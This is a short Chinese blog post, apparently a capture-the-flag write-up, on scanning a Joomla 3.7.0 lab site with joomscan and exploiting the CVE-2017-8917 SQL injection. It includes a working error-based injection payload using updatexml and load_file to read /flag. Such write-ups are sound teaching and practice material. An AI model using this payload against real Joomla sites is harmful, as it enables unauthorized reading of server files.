Joomla Writeup

  • joomla的cms系统,可以使用joomscan来探测信息
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u http://whalwl.site:8039/

扫描得到系统版本: Joomla 3.7.0
后台地址:/administrator/

通过对Joomla 3.7.0版本查找,发现存在一个注入漏洞cve-2017-8917

image

mysql root用户,根据题目提示直接读取文件

image

pyload如下:

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,load_file(0x2f666c6167)),1)

0x2f666c6167/flag得hex编码

image

posted @ 2021-11-20 15:43  jzking121  阅读(114)  评论(0编辑  收藏  举报